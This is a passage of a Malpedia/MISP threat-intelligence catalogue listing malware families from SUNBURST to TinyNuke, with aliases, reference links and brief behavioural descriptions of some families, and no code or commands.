The tag is: misp-galaxy:malpedia="SUNBURST"

SUNBURST is also known as:

- Solorigate

**Table 2557. Table References**

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<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.sunburst">https://malpedia.caad.fkie.fraunhofer.de/details/win.sunburst</a></td>
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<td><a href="https://www.brighttalk.com/webcast/7451/462719">https://www.brighttalk.com/webcast/7451/462719</a></td>
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<td><a href="https://netresec.com/?b=212a6ad">https://netresec.com/?b=212a6ad</a></td>
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<td><a href="https://www.volexity.com/blog/2020/12/14/dark-halo-leverages-solarwinds-compromise-to-breach-organizations/">https://www.volexity.com/blog/2020/12/14/dark-halo-leverages-solarwinds-compromise-to-breach-organizations/</a></td>
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<td><a href="https://ics-cert.kaspersky.com/reports/2021/01/26/sunburst-industrial-victims/">https://ics-cert.kaspersky.com/reports/2021/01/26/sunburst-industrial-victims/</a></td>
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<td><a href="https://www.domaintools.com/resources/blog/continuous-eruption-further-analysis-of-the-solarwinds-supply-incident">https://www.domaintools.com/resources/blog/continuous-eruption-further-analysis-of-the-solarwinds-supply-incident</a></td>
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<td><a href="https://www.brighttalk.com/webcast/7451/469525">https://www.brighttalk.com/webcast/7451/469525</a></td>
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<td><a href="https://blog.truesec.com/2021/01/07/avoiding-supply-chain-attacks-similar-to-solarwinds-orions-sunburst">https://blog.truesec.com/2021/01/07/avoiding-supply-chain-attacks-similar-to-solarwinds-orions-sunburst</a></td>
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<td><a href="https://blog.prevasio.com/2020/12/sunburst-backdoor-part-ii-dga-list-of.html">https://blog.prevasio.com/2020/12/sunburst-backdoor-part-ii-dga-list-of.html</a></td>
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<td><a href="https://github.com/sophos-cybersecurity/solarwinds-threathunt">https://github.com/sophos-cybersecurity/solarwinds-threathunt</a></td>
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<td><a href="https://twitter.com/0xrb/status/1339199268146442241">https://twitter.com/0xrb/status/1339199268146442241</a></td>
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<td><a href="https://netresec.com/?b=211cd21">https://netresec.com/?b=211cd21</a></td>
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<td><a href="https://threatconnect.com/blog/tracking-sunburst-related-activity-with-threatconnect-dashboards">https://threatconnect.com/blog/tracking-sunburst-related-activity-with-threatconnect-dashboards</a></td>
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<td><a href="https://github.com/RedDrip7/SunBurst_DGA_Decode">https://github.com/RedDrip7/SunBurst_DGA_Decode</a></td>
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<td><a href="https://www.domaintools.com/resources/blog/the-devils-in-the-details-sunburst-attribution">https://www.domaintools.com/resources/blog/the-devils-in-the-details-sunburst-attribution</a></td>
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<td><a href="https://medium.com/mitre-attack/identifying-unc2452-related-techniques-9f7b6c7f3714">https://medium.com/mitre-attack/identifying-unc2452-related-techniques-9f7b6c7f3714</a></td>
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<td><a href="https://twitter.com/cybercdh/status/1338975171093336067">https://twitter.com/cybercdh/status/1338975171093336067</a></td>
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<td><a href="https://gist.github.com/olafhartong/71ffdd4cab4b6acd5cbcd1a0691ff82f">https://gist.github.com/olafhartong/71ffdd4cab4b6acd5cbcd1a0691ff82f</a></td>
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<td><a href="https://mp.weixin.qq.com/s/UqXC1vovKUu97569LkYm2Q">https://mp.weixin.qq.com/s/UqXC1vovKUu97569LkYm2Q</a></td>
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SunCrypt

The tag is: misp-galaxy:malpedia="SunCrypt"

SunCrypt is also known as:

*Table 2558. Table References*

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<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.suncrypt">https://malpedia.caad.fkie.fraunhofer.de/details/win.suncrypt</a></td>
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<tr>
<td><a href="https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf">https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf</a></td>
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SunOrcal

The tag is: *misp-galaxy:malpedia=*SunOrcal*

SunOrcal is also known as:

Table 2559. Table References

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<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.sunorcal">https://malpedia.caad.fkie.fraunhofer.de/details/win.sunorcal</a></td>
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SUPERNOVA

The tag is: *misp-galaxy:malpedia=*SUPERNOVA*

SUPERNOVA is also known as:

Table 2560. Table References

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<td><a href="https://github.com/fireeye/sunburst_countermeasures">https://github.com/fireeye/sunburst_countermeasures</a></td>
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<td><a href="https://us-cert.cisa.gov/ncas/alerts/aa21-008a">https://us-cert.cisa.gov/ncas/alerts/aa21-008a</a></td>
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<td><a href="https://www.anquanke.com/post/id/226029">https://www.anquanke.com/post/id/226029</a></td>
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SuppoBox

The tag is: misp-galaxy:malpedia="SuppoBox"

SuppoBox is also known as:

- Bayrob
- Nivdort

Table 2561. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.suppobox
https://www.symantec.com/connect/blogs/trojanbayrob-strikes-again-1

surtr

The tag is: misp-galaxy:malpedia="surtr"

surtr is also known as:

Table 2562. Table References
The tag is: `misp-galaxy:malpedia="swen"`

swen is also known as:

Table 2563. Table References

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<tr>
<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.swen">https://malpedia.caad.fkie.fraunhofer.de/details/win.swen</a></td>
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The tag is: `misp-galaxy:malpedia="Sword"`

**Sword**

Sword is also known as:

Table 2564. Table References

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<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.sword">https://malpedia.caad.fkie.fraunhofer.de/details/win.sword</a></td>
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The tag is: `misp-galaxy:malpedia="sykipot"`

**sykipot**

sykipot is also known as:

- Wkysol
- getkys

Table 2565. Table References

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<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.sykipot">https://malpedia.caad.fkie.fraunhofer.de/details/win.sykipot</a></td>
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<td><a href="https://www.alienvault.com/blogs/labs-research/sykipot-is-back">https://www.alienvault.com/blogs/labs-research/sykipot-is-back</a></td>
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<tr>
<td><a href="https://community.rsa.com/thread/185437">https://community.rsa.com/thread/185437</a></td>
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<tr>
<td><a href="https://www.secureworks.com/research/threat-profiles/bronze-edison">https://www.secureworks.com/research/threat-profiles/bronze-edison</a></td>
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SynAck

The tag is: `misp-galaxy:malpedia`"SynAck"

SynAck is also known as:

Table 2566. Table References

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<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.synack">https://malpedia.caad.fkie.fraunhofer.de/details/win.synack</a></td>
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<td><a href="https://securelist.com/synack-targeted-ransomware-uses-the-doppelganging-technique/85431/">https://securelist.com/synack-targeted-ransomware-uses-the-doppelganging-technique/85431/</a></td>
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SyncCrypt

The tag is: `misp-galaxy:malpedia`"SyncCrypt"

SyncCrypt is also known as:

Table 2567. Table References

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<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.syncrypt">https://malpedia.caad.fkie.fraunhofer.de/details/win.syncrypt</a></td>
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SynFlooder

The tag is: `misp-galaxy:malpedia`"SynFlooder"

SynFlooder is also known as:

Table 2568. Table References

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<tr>
<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.synflooder">https://malpedia.caad.fkie.fraunhofer.de/details/win.synflooder</a></td>
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**Synth Loader**

The tag is: `misp-galaxy:malpedia="Synth Loader"`

Synth Loader is also known as:

*Table 2569. Table References*

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**Sys10**

The tag is: `misp-galaxy:malpedia="Sys10"`

Sys10 is also known as:

*Table 2570. Table References*

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<td><a href="https://securelist.com/analysis/publications/69953/the-naikon-apt/">https://securelist.com/analysis/publications/69953/the-naikon-apt/</a></td>
</tr>
<tr>
<td><a href="https://www2.fireeye.com/rs/fireye/images/rpt-apt30.pdf">https://www2.fireeye.com/rs/fireye/images/rpt-apt30.pdf</a></td>
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**Syscon**

SYSCON is a Remote Access Trojan used in a targeted phishing campaign against US government agencies. It has been recently observed in conjunction with CARROTBAT and CARROTBALL downloaders and it uses the File Transfer Protocol as Command and Control channel. Use of the family is attributed by Unit 42 to the Konni Group.

The tag is: `misp-galaxy:malpedia="Syscon"`

Syscon is also known as:

*Table 2571. Table References*

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<tr>
<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.syscon">https://malpedia.caad.fkie.fraunhofer.de/details/win.syscon</a></td>
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SysGet

The tag is: *misp-galaxy:malpedia*="SysGet"

SysGet is also known as:

*Table 2572. Table References*

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<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.sysget">https://malpedia.caad.fkie.fraunhofer.de/details/win.sysget</a></td>
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<tr>
<td><a href="http://researchcenter.paloaltonetworks.com/2017/01/unit42-dragonok-updates-toolset-targets-multiple-geographic-regions/">http://researchcenter.paloaltonetworks.com/2017/01/unit42-dragonok-updates-toolset-targets-multiple-geographic-regions/</a></td>
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SysKit

The tag is: *misp-galaxy:malpedia*="SysKit"

SysKit is also known as:

- IvizTech
- MANGOPUNCH

*Table 2573. Table References*

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<tr>
<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.syskit">https://malpedia.caad.fkie.fraunhofer.de/details/win.syskit</a></td>
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<td><a href="https://twitter.com/QW5kcmV3/status/1176861114535165952">https://twitter.com/QW5kcmV3/status/1176861114535165952</a></td>
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Sysraw Stealer

Sysraw stealer got its name because at some point, it was started as "ZSysRaw\sysraw.exe". PDB strings suggest the name "Clipsa" though. First stage connects to /WPCoreLog/, the second one to /WPSecurity/. Its behavior suggest that it is an info stealer. It creates a rather large amount of files in a subdirectory (e.g. data) named “1?[-+]“.dat” and POSTs them.

The tag is: *misp-galaxy:malpedia*="Sysraw Stealer"

Sysraw Stealer is also known as:
• Clipsa

Table 2574. Table References

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<tr>
<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.sysraw_stealer">https://malpedia.caad.fkie.fraunhofer.de/details/win.sysraw_stealer</a></td>
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<tr>
<td><a href="https://decoded.avast.io/janrubin/clipsa-multipurpose-password-stealer/">https://decoded.avast.io/janrubin/clipsa-multipurpose-password-stealer/</a></td>
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**SysScan**

The tag is: *misp-galaxy:malpedia=*"SysScan"

SysScan is also known as:

Table 2575. Table References

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<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.sysscan">https://malpedia.caad.fkie.fraunhofer.de/details/win.sysscan</a></td>
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**SystemBC**

SystemBC is a proxy malware leveraging SOCKS5. Based on screenshots used in ads on a underground marketplace, Proofpoint decided to call it SystemBC.

SystemBC has been observed occasionally, but more pronounced since June 2019. First samples goes back to October 2018.

The tag is: *misp-galaxy:malpedia=*"SystemBC"

SystemBC is also known as:

Table 2576. Table References

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<tr>
<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.systembc">https://malpedia.caad.fkie.fraunhofer.de/details/win.systembc</a></td>
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<td><a href="https://www.fireeye.com/blog/threat-research/2021/02/melting-unc2198-icedid-to-ransomware-operations.html">https://www.fireeye.com/blog/threat-research/2021/02/melting-unc2198-icedid-to-ransomware-operations.html</a></td>
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<tr>
<td><a href="https://isc.sans.edu/forums/diary/Excel+spreadsheets+push+SystemBC+malware/27060/">https://isc.sans.edu/forums/diary/Excel+spreadsheets+push+SystemBC+malware/27060/</a></td>
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Szribi
The tag is: `misp-galaxy:malpedia="Szribi"`

Szribi is also known as:

Table 2577. Table References

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<tr>
<td><a href="https://www.secureworks.com/research/srizbi">https://www.secureworks.com/research/srizbi</a></td>
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TabMsgSQL
The tag is: `misp-galaxy:malpedia="TabMsgSQL"`

TabMsgSQL is also known as:

Table 2578. Table References

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<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.tabmsgsql">https://malpedia.caad.fkie.fraunhofer.de/details/win.tabmsgsql</a></td>
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taidoor
The tag is: `misp-galaxy:malpedia="taidoor"`

taidoor is also known as:

- simbot

Table 2579. Table References

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<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.taidoor">https://malpedia.caad.fkie.fraunhofer.de/details/win.taidoor</a></td>
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<tr>
<td><a href="https://us-cert.cisa.gov/ncas/analysis-reports/ar20-216a">https://us-cert.cisa.gov/ncas/analysis-reports/ar20-216a</a></td>
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## TAINTEDSCRIBE

The tag is: `misp-galaxy:malpedia="TAINTEDSCRIBE"`

TAINTEDSCRIBE is also known as:

### Table 2580. Table References

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<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.taintedscribe">https://malpedia.caad.fkie.fraunhofer.de/details/win.taintedscribe</a></td>
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<tr>
<td><a href="https://www.us-cert.gov/ncas/analysis-reports/ar20-133b">https://www.us-cert.gov/ncas/analysis-reports/ar20-133b</a></td>
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<tr>
<td><a href="https://blog.reversinglabs.com/blog/hidden-cobra">https://blog.reversinglabs.com/blog/hidden-cobra</a></td>
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## Taleret

The tag is: `misp-galaxy:malpedia="Taleret"`

Taleret is also known as:

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<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.taleret">https://malpedia.caad.fkie.fraunhofer.de/details/win.taleret</a></td>
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## Tandfuy

The tag is: `misp-galaxy:malpedia="Tandfuy"`

Tandfuy is also known as:

### Table 2582. Table References

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**Tapouox**

The tag is: `misp-galaxy:malpedia="Tapouox"`

Tapouox is also known as:

**Table 2583. Table References**

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**Tarsip**

The tag is: `misp-galaxy:malpedia="Tarsip"`

Tarsip is also known as:

**Table 2584. Table References**

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</table>

**Taurus Stealer**

According to Zscaler, Taurus is a stealer that surfaced in June 2020. It is being developed by the author(s) that previously created Predator the Thief. The name overlaps partly with the StealerOne / Terra* family (also aliased Taurus Loader) but appears to be a completely disjunct project.

The tag is: `misp-galaxy:malpedia="Taurus Stealer"`

Taurus Stealer is also known as:

**Table 2585. Table References**

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<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.taurus_stealer">https://malpedia.caad.fkie.fraunhofer.de/details/win.taurus_stealer</a></td>
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</table>

**TClient**

Steve Miller pointed out that it is proxy-aware (Tencent) for C&C communication and uses wolfSSL, which makes it stick out.
The tag is: *misp-galaxy:malpedia=*"TClient"

TClient is also known as:

- FIRESHADOW

### Table 2586. Table References

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<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.tclient">https://malpedia.caad.fkie.fraunhofer.de/details/win.tclient</a></td>
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<td><a href="https://twitter.com/stvemillertime/status/1266050369370677249">https://twitter.com/stvemillertime/status/1266050369370677249</a></td>
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### tDiscoverer

The tag is: *misp-galaxy:malpedia=*"tDiscoverer"

tDiscoverer is also known as:

- HAMMERTOSS
- HammerDuke

### Table 2587. Table References

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<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.tdiscoverer">https://malpedia.caad.fkie.fraunhofer.de/details/win.tdiscoverer</a></td>
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<td><a href="https://www2.fireeye.com/rs/848-DID-242/images/rpt-apt29-hammertoss.pdf">https://www2.fireeye.com/rs/848-DID-242/images/rpt-apt29-hammertoss.pdf</a></td>
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<tr>
<td><a href="https://securityintelligence.com/hammertoss-what-me-worry/">https://securityintelligence.com/hammertoss-what-me-worry/</a></td>
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<tr>
<td><a href="https://www.youtube.com/watch?v=UE9suwyuic8">https://www.youtube.com/watch?v=UE9suwyuic8</a></td>
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### TDTESS

The tag is: *misp-galaxy:malpedia=*"TDTESS"

TDTESS is also known as:

### Table 2588. Table References

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<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.tdtess">https://malpedia.caad.fkie.fraunhofer.de/details/win.tdtess</a></td>
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<tr>
<td><a href="http://www.clearskysec.com/tulip/">http://www.clearskysec.com/tulip/</a></td>
</tr>
</tbody>
</table>

### TeamBot

Recently, Check Point researchers spotted a targeted attack against officials within government finance authorities and representatives in several embassies in Europe. The attack, which starts with a malicious attachment disguised as a top secret US document, weaponizes TeamViewer, the
popular remote access and desktop sharing software, to gain full control of the infected computer. This is achieved by sideloading another DLL among the legit TeamViewer.

The tag is: misp-galaxy:malpedia="TeamBot"

TeamBot is also known as:

- FINTEAM

Table 2589. Table References

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<tr>
<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.teambot">https://malpedia.caad.fkie.fraunhofer.de/details/win.teambot</a></td>
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<td><a href="https://research.checkpoint.com/finteam-trojanized-teamviewer-against-government-targets/">https://research.checkpoint.com/finteam-trojanized-teamviewer-against-government-targets/</a></td>
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</table>

**TeamSpy**

The tag is: misp-galaxy:malpedia="TeamSpy"

TeamSpy is also known as:

- TVRAT
- TVSPY
- TeamViewerENT

Table 2590. Table References

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<tr>
<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.teamspy">https://malpedia.caad.fkie.fraunhofer.de/details/win.teamspy</a></td>
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</tbody>
</table>

**TEARDROP**

TEARDROP is a memory only dropper that runs as a service, spawns a thread and reads from the file “gracious_truth.jpg”, which likely has a fake JPG header. Next it checks that HKU\SOFTWARE\Microsoft\CTF exists, decodes an embedded payload using a custom rolling XOR algorithm and manually loads into memory an embedded payload using a custom PE-like file format. TEARDROP does not have code overlap with any previously seen malware. FireEye believe that this was used to execute a customized Cobalt Strike BEACON.

The tag is: misp-galaxy:malpedia="TEARDROP"

TEARDROP is also known as:

Table 2591. Table References
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<td><a href="https://www.brighttalk.com/webcast/7451/462719">https://www.brighttalk.com/webcast/7451/462719</a></td>
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<td><a href="https://blog.securehat.co.uk/malware-analysis/extracting-the-cobalt-strike-config-from-a-teardrop-loader">https://blog.securehat.co.uk/malware-analysis/extracting-the-cobalt-strike-config-from-a-teardrop-loader</a></td>
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<td><a href="https://twitter.com/craiu/status/1339954817247158272">https://twitter.com/craiu/status/1339954817247158272</a></td>
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<td><a href="https://unit42.paloaltoneetworks.com/solarstorm-supply-chain-attack-timeline">https://unit42.paloaltoneetworks.com/solarstorm-supply-chain-attack-timeline</a></td>
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<tr>
<td><a href="https://www.youtube.com/watch?v=LA-XESJy2kU">https://www.youtube.com/watch?v=LA-XESJy2kU</a></td>
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<td><a href="https://github.com/fireeye/sunburst_countermeasures">https://github.com/fireeye/sunburst_countermeasures</a></td>
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<td><a href="https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf">https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf</a></td>
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<td><a href="https://blog.talosintelligence.com/2020/12/solarwinds-supplychain-coverage.html#more">https://blog.talosintelligence.com/2020/12/solarwinds-supplychain-coverage.html#more</a></td>
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<td><a href="https://twitter.com/TheEnergyStory/status/1346096298311741440">https://twitter.com/TheEnergyStory/status/1346096298311741440</a></td>
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<td><a href="https://www.fortinet.com/blog/threat-research/what-we-have-learned-so-far-about-the-sunburst-solarwinds-hack">https://www.fortinet.com/blog/threat-research/what-we-have-learned-so-far-about-the-sunburst-solarwinds-hack</a></td>
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<td><a href="https://us-cert.cisa.gov/ncas/analysis-reports/ar21-039b">https://us-cert.cisa.gov/ncas/analysis-reports/ar21-039b</a></td>
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<td><a href="https://twitter.com/TheEnergyStory/status/13420410555633313152">https://twitter.com/TheEnergyStory/status/13420410555633313152</a></td>
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<td><a href="https://0xc0decafe.com/malware-analyst-guide-to-pe-timestamps/">https://0xc0decafe.com/malware-analyst-guide-to-pe-timestamps/</a></td>
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<td><a href="https://medium.com/mitre-attack/identifying-unc2452-related-techniques-9f7b6c7f3714">https://medium.com/mitre-attack/identifying-unc2452-related-techniques-9f7b6c7f3714</a></td>
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<td><a href="https://www.microsoft.com/security/blog/2021/03/04/goldmax-goldfinder-sibot-analyzing-nobelium-malware">https://www.microsoft.com/security/blog/2021/03/04/goldmax-goldfinder-sibot-analyzing-nobelium-malware</a></td>
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1070
TefoSteal

The tag is: `misp-galaxy:malpedia="TefoSteal"`

TefoSteal is also known as:

Table 2592. Table References

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<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.tefosteal">malpedia.caad.fkie.fraunhofer.de/details/win.tefosteal</a></td>
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<tr>
<td><a href="https://twitter.com/WDSecurity/status/1105990738993504256">twitter.com/WDSecurity/status/1105990738993504256</a></td>
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TelAndExt

According to Check Point, this is a Telegram-focused infostealer (FTP / Delphi) used to target Iranian expats and dissidents.

The tag is: `misp-galaxy:malpedia="TelAndExt"`

TelAndExt is also known as:

Table 2593. Table References

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<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.telandext">malpedia.caad.fkie.fraunhofer.de/details/win.telandext</a></td>
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TelB

According to Check Point, this is a Telegram-focused infostealer (SOAP / Delphi) used to target Iranian expats and dissidents.

The tag is: `misp-galaxy:malpedia="TelB"`

TelB is also known as:

Table 2594. Table References

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<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.telb">malpedia.caad.fkie.fraunhofer.de/details/win.telb</a></td>
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TeleBot

The tag is: `misp-galaxy:malpedia="TeleBot"`

TeleBot is also known as:
**TeleDoor**

The tag is: `misp-galaxy:malpedia="TeleDoor"`

TeleDoor is also known as:

**Tempedreve**

The tag is: `misp-galaxy:malpedia="Tempedreve"`

Tempedreve is also known as:

**Terminator RAT**

The tag is: `misp-galaxy:malpedia="Terminator RAT"`

Terminator RAT is also known as:

- Fakem RAT
Termite

The tag is: `misp-galaxy:malpedia="Termite"`

Termite is also known as:

Table 2599. Table References

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<tr>
<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.termite">https://malpedia.caad.fkie.fraunhofer.de/details/win.termite</a></td>
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<tr>
<td><a href="https://threatrecon.nshc.net/2019/03/19/sectorm04-targeting-singapore-custom-malware-analysis/">https://threatrecon.nshc.net/2019/03/19/sectorm04-targeting-singapore-custom-malware-analysis/</a></td>
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TerraPreter

The tag is: `misp-galaxy:malpedia="TerraPreter"`

TerraPreter is also known as:

Table 2600. Table References

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<tr>
<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.terrapreter">https://malpedia.caad.fkie.fraunhofer.de/details/win.terrapreter</a></td>
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TerraLoader

The tag is: `misp-galaxy:malpedia="TerraLoader"`

TerraLoader is also known as:

Table 2601. Table References

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<tr>
<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.terra_loader">https://malpedia.caad.fkie.fraunhofer.de/details/win.terra_loader</a></td>
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</tbody>
</table>

TerraRecon

According to QuoINT TerraRecon is a reconnaissance tool, looking for a specific piece of hardware and software targeting retail and payment services sectors. Attributed to Golden Chickens.

The tag is: `misp-galaxy:malpedia="TerraRecon"`
TerraRecon is also known as:

- Taurus Loader Reconnaissance Module

Table 2602. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.terra_recon

TerraStealer

According to QuoINT, TerraStealer (also known as SONE or StealerOne) is a generic reconnaissance tool, targeting for example email clients, web browsers, and file transfer utilities. Attributed to Golden Chickens.

The tag is: misp-galaxy:malpedia="TerraStealer"

TerraStealer is also known as:

- SONE
- StealerOne
- Taurus Loader Stealer Module

Table 2603. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.terra_stealer
https://github.com/eset/malware-ioc/tree/master/evilnum
https://twitter.com/3xp0rtblog/status/1275746149719252992

TerraTV

TerraTV is a custom DLL designed to hijack legit TeamViewer applications. It was discovered and documented by QuoINT. It has been attributed to Golden Chickens malware as a service group.

The tag is: misp-galaxy:malpedia="TerraTV"
TerraTV is also known as:

- Taurus Loader TeamViewer Module

Table 2604. Table References

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<tr>
<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.terra_tv">https://malpedia.caad.fkie.fraunhofer.de/details/win.terra_tv</a></td>
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TeslaCrypt

The tag is: misp-galaxy:malpedia="TeslaCrypt"

TeslaCrypt is also known as:

- cryptesla

Table 2605. Table References

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<tr>
<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.teslacrypt">https://malpedia.caad.fkie.fraunhofer.de/details/win.teslacrypt</a></td>
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<td><a href="https://blogs.cisco.com/security/talos/teslacrypt">https://blogs.cisco.com/security/talos/teslacrypt</a></td>
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<td><a href="https://blog.malwarebytes.com/threat-analysis/2016/03/teslacrypt-spam-campaign-unpaid-issue/">https://blog.malwarebytes.com/threat-analysis/2016/03/teslacrypt-spam-campaign-unpaid-issue/</a></td>
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<td><a href="https://community.riskiq.com/article/30f22a00">https://community.riskiq.com/article/30f22a00</a></td>
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<td><a href="https://www.endgame.com/blog/technical-blog/your-package-has-been-successfully-encrypted-teslacrypt-41a-and-malware-attack">https://www.endgame.com/blog/technical-blog/your-package-has-been-successfully-encrypted-teslacrypt-41a-and-malware-attack</a></td>
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<tr>
<td><a href="https://www.welivesecurity.com/2015/12/16/nemucod-malware-spreads-ransomware-teslacrypt-around-world/">https://www.welivesecurity.com/2015/12/16/nemucod-malware-spreads-ransomware-teslacrypt-around-world/</a></td>
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</table>

TFlower Ransomware

TFlower is a new ransomware targeting mostly corporate networks discovered in August, 2019. It is
reportedly installed on networks by attackers after they gain access via RDP. TFlower displays a console showing activity being performed by the ransomware when it encrypts a machine, further indicating that this ransomware is triggered by the attacker post compromise, similar to Samsam/Samas in terms of TTP. Once encryption is started, the ransomware will conduct a status report to an apparently hard-coded C2. Shadow copies are deleted and the Windows 10 repair environment is disabled by this ransomware. This malware also will terminate any running Outlook.exe process so that the mail files can be encrypted. This ransomware does not add an extension to encrypted files, but prepends the marker "*tflower" and what may be the encrypted encryption key for the file to each affected file. Once encryption is completed, another status report is sent to the C2 server.

The tag is: *misp-galaxy:malpedia="TFlower Ransomware"

TFlower Ransomware is also known as:

Table 2606. Table References

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<tr>
<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.tflower">https://malpedia.caad.fkie.fraunhofer.de/details/win.tflower</a></td>
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<tr>
<td><a href="https://www.sygnia.co/mata-framework">https://www.sygnia.co/mata-framework</a></td>
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**Thanatos**

The tag is: *misp-galaxy:malpedia="Thanatos"

Thanatos is also known as:

- Alphabot

Table 2607. Table References

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<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.thanatos">https://malpedia.caad.fkie.fraunhofer.de/details/win.thanatos</a></td>
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**Thanatos Ransomware**

The tag is: *misp-galaxy:malpedia="Thanatos Ransomware"

Thanatos Ransomware is also known as:

Table 2608. Table References

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ThinMon

The tag is: misp-galaxy:malpedia="ThinMon"

ThinMon is also known as:

Table 2609. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.thinmon

https://mp.weixin.qq.com/s/nyxZFXgrtm2-tBiV3-wiMg

ThreeByte

The tag is: misp-galaxy:malpedia="ThreeByte"

ThreeByte is also known as:

Table 2610. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.threebyte


ThumbThief

The tag is: misp-galaxy:malpedia="ThumbThief"

ThumbThief is also known as:

Table 2611. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.thumbthief

ThunderX Ransomware

The tag is: `misp-galaxy:malpedia="ThunderX Ransomware"`

ThunderX Ransomware is also known as:

- Ranzy Locker

Table 2612. Table References

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<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.thunderx">https://malpedia.caad.fkie.fraunhofer.de/details/win.thunderx</a></td>
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<td><a href="https://id-ransomware.blogspot.com/2020/08/thunderx-ransomware.html">https://id-ransomware.blogspot.com/2020/08/thunderx-ransomware.html</a></td>
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Thunker

The tag is: `misp-galaxy:malpedia="Thunker"`

Thunker is also known as:

Table 2613. Table References

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Tidepool

The tag is: `misp-galaxy:malpedia="Tidepool"`

Tidepool is also known as:

Table 2614. Table References

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<td><a href="http://researchcenter.paloaltonetworks.com/2016/05/operation-ke3chang-resurfaces-with-new-tidepool-malware/">http://researchcenter.paloaltonetworks.com/2016/05/operation-ke3chang-resurfaces-with-new-tidepool-malware/</a></td>
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Tinba

The tag is: misp-galaxy:malpedia="Tinba"

Tinba is also known as:

• Illi
• TinyBanker
• Zusy

Table 2615. Table References

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<tr>
<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.tinba">https://malpedia.caad.fkie.fraunhofer.de/details/win.tinba</a></td>
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<td><a href="https://adalogics.com/blog/the-state-of-advanced-code-injections">https://adalogics.com/blog/the-state-of-advanced-code-injections</a></td>
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<td><a href="https://securityblog.switch.ch/2015/06/18/so-long-and-thanks-for-all-the-domains/">https://securityblog.switch.ch/2015/06/18/so-long-and-thanks-for-all-the-domains/</a></td>
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<td><a href="http://contagiodump.blogspot.com/2012/06/amazon.html">http://contagiodump.blogspot.com/2012/06/amazon.html</a></td>
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<td><a href="http://garage4hackers.com/entry.php?b=3086">http://garage4hackers.com/entry.php?b=3086</a></td>
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<tr>
<td><a href="http://www.theregister.co.uk/2012/06/04/small_banking_trojan/">http://www.theregister.co.uk/2012/06/04/small_banking_trojan/</a></td>
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TinyLoader

The tag is: misp-galaxy:malpedia="TinyLoader"

TinyLoader is also known as:

Table 2616. Table References

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<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.tinyloader">https://malpedia.caad.fkie.fraunhofer.de/details/win.tinyloader</a></td>
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TinyMet

TinyMet is a meterpreter stager.

The tag is: misp-galaxy:malpedia="TinyMet"

TinyMet is also known as:

- TiniMet

Table References

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<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.tinymet">https://malpedia.caad.fkie.fraunhofer.de/details/win.tinymet</a></td>
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<td><a href="https://github.com/SherifEldeeb/TinyMet">https://github.com/SherifEldeeb/TinyMet</a></td>
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<tr>
<td><a href="https://www.fsec.or.kr/common/proc/fsec/bbs/163/fileDownLoad/2297.do">https://www.fsec.or.kr/common/proc/fsec/bbs/163/fileDownLoad/2297.do</a></td>
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<td><a href="https://twitter.com/VK_Intel/status/1273292957429510150">https://twitter.com/VK_Intel/status/1273292957429510150</a></td>
</tr>
<tr>
<td><a href="https://www.secureworks.com/research/threat-profiles/gold-niagara">https://www.secureworks.com/research/threat-profiles/gold-niagara</a></td>
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</table>

TinyNuke

TinyNuke (aka Nuclear Bot) is a fully-fledged banking trojan including HiddenDesktop/VNC server and a reverse socks4 server. It was for sale on underground marketplaces for $2500 in 2016. The program’s author claimed the malware was written from scratch, but that it functioned similarly to the ZeuS banking trojan in that it could steal passwords and inject arbitrary content when victims visited banking Web sites. However, he then proceeded to destroy his own reputation on hacker forums by promoting his development too aggressively. As a displacement activity, he published his source code on Github. XBot is an off-spring of TinyNuke, but very similar to its ancestor.

The tag is: misp-galaxy:malpedia="TinyNuke"

TinyNuke is also known as:

- MicroBankingTrojan
- Nuclear Bot
• NukeBot
• Xbot

Table 2618. Table References

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<tr>
